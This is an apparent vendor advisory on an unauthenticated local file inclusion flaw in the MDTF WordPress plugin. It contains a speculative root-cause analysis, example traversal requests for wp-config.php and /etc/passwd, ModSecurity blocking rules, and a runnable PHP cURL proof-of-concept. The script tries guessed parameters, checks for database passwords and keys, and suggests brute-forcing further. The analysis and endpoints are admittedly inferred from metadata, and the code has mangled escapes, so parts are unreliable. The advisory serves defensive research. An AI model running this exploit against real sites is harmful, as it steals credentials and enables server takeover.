Atomic Edge analysis of CVE-2026-54845 (metadata-based): This vulnerability allows unauthenticated local file inclusion (LFI) in the MDTF – Meta Data and Taxonomies Filter plugin for WordPress, affecting versions up to and including 1.3.8. The CVSS score is 8.1, indicating high severity due to the potential for full server compromise. The CWE classification (CWE-98) points to a PHP include/require statement that accepts user-supplied filenames without proper sanitization.
Root Cause: The vulnerability likely stems from a dynamic include of a template or file path based on user input, such as a ‘view’ or ‘template’ parameter. WordPress plugins commonly implement filter or search functionality that loads custom display templates. If the plugin uses an include statement like `include(plugin_dir_path(__FILE__) . ‘templates/’ . $_REQUEST[‘view’] . ‘.php’);` without sanitization, an attacker can supply path traversal sequences (e.g., `../../../wp-config.php`) to include arbitrary files. This is inferred from the CWE and description because no source code is available for confirmation.
Exploitation: An unauthenticated attacker sends a crafted HTTP request to a vulnerable endpoint, likely an AJAX handler or front-end script. The typical pattern is a GET or POST parameter named ‘tpl’, ‘template’, ‘view’, or similar, passed to the plugin’s filter functionality. For example, the request `GET /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php?tpl=../../../wp-config` triggers path traversal. The attacker can then read sensitive files (wp-config.php, /etc/passwd) or achieve remote code execution by including an uploaded image containing PHP code (e.g., via the WordPress media uploader). No authentication is required.
Remediation: The plugin must validate and sanitize any user-supplied input used in include/require statements. The fix should restrict included files to a predefined whitelist of allowed paths, use realpath() to resolve the absolute path and verify it falls within an allowed directory, and strip directory traversal sequences. Version 1.3.9 likely implements these measures.
Impact: Successful exploitation allows an attacker to read sensitive server files (exposing database credentials, salts, and keys) and execute arbitrary PHP code. This leads to complete site compromise: privilege escalation, data theft, malware injection, and full server takeover. Atomic Edge research assesses this vulnerability as critical due to the unauthenticated access vector and the high privilege escalation potential.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-54845 (metadata-based)
# Blocks local file inclusion attempts via the MDTF plugin by matching
# path traversal patterns in template/view parameters on plugin endpoints.
# Rules are narrowly scoped to the vulnerable plugin directory.
# Rule 1: Block path traversal in 'tpl' parameter on plugin index.php
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-54845 - LFI attempt via tpl parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
SecRule ARGS:tpl "@rx ../|file://|php://|expect://"
"t:urlDecode,t:lowercase,chain"
SecRule ARGS:tpl "@rx ../" "t:urlDecode"
# Rule 2: Block path traversal in 'template' parameter
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php"
"id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2026-54845 - LFI attempt via template parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
SecRule ARGS:template "@rx ../|file://|php://|expect://"
"t:urlDecode,t:lowercase,chain"
SecRule ARGS:template "@rx ../" "t:urlDecode"
# Rule 3: Block path traversal in 'view' parameter
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php"
"id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2026-54845 - LFI attempt via view parameter',severity:'CRITICAL',tag:'CVE-2026-54845'"
SecRule ARGS:view "@rx ../|file://|php://|expect://"
"t:urlDecode,t:lowercase,chain"
SecRule ARGS:view "@rx ../" "t:urlDecode"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-54845 - MDTF – Meta Data and Taxonomies Filter <= 1.3.8 - Unauthenticated Local File Inclusion
// This PoC demonstrates how an unauthenticated attacker can include arbitrary files
// by manipulating a template/view parameter in the plugin's front-end script.
// Configurable target
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site
// The file to include. Typically the attacker targets wp-config.php to extract
// database credentials, salts, and keys. Path traversal sequences are used to
// navigate from the plugin directory to the WordPress root.
// Default payload: ../../../wp-config (no .php extension if the code appends it)
$file_to_read = '../../../wp-config';
// Construct the exploit URL.
// Based on common WordPress plugin patterns, the parameter might be 'tpl', 'template',
// 'view', or 'file'. We try multiple endpoints.
$endpoints = [
'/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php?tpl=' . $file_to_read,
'/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php?template=' . $file_to_read,
'/wp-content/plugins/wp-meta-data-filter-and-taxonomy-filter/index.php?view=' . $file_to_read,
];
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$found = false;
foreach ($endpoints as $endpoint) {
$url = $target_url . $endpoint;
echo "[*] Trying: $urln";
curl_setopt($ch, CURLOPT_URL, $url);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($response === false) {
echo "[!] cURL error: " . curl_error($ch) . "n";
continue;
}
// PHP files included this way will execute on the server. The response will
// contain the output of the included file. For wp-config.php, this includes
// define() statements and database credentials unless the plugin outputs them.
// A successful inclusion will likely return HTML/PHP output or an error message
// indicating the file was processed.
if ($http_code == 200 && !empty($response)) {
// Check if we see typical wp-config content or the absence of a 'file not found' error
if (strpos($response, 'DB_NAME') !== false ||
strpos($response, 'DB_USER') !== false ||
strpos($response, 'DB_PASSWORD') !== false ||
strpos($response, 'AUTH_KEY') !== false ||
strpos($response, 'wp-config') !== false) {
echo "[+] SUCCESS! File included from endpoint: $endpointn";
echo "[+] Response snippet:n" . substr($response, 0, 2000) . "n";
$found = true;
break;
} else {
echo "[*] HTTP 200 but no sensitive data detected. Response may be the included file's output.n";
echo "[*] Response preview: " . substr($response, 0, 500) . "n";
}
} else {
echo "[!] HTTP status: $http_code - endpoint may not exist or is blocked.n";
}
}
curl_close($ch);
if (!$found) {
echo "[-] No vulnerable endpoint found with these payloads. The plugin may be patched, or the parameter name differs.n";
echo "[-] Try changing the file name or probing other parameters like 'file', 'page', 'include'.n";
}
// Note: This PoC assumes the vulnerable parameter and endpoint. Actual exploitation
// may require brute-forcing parameters or discovering the exact vulnerable handler.
// Atomic Edge research recommends using this script as a starting point for manual testing.
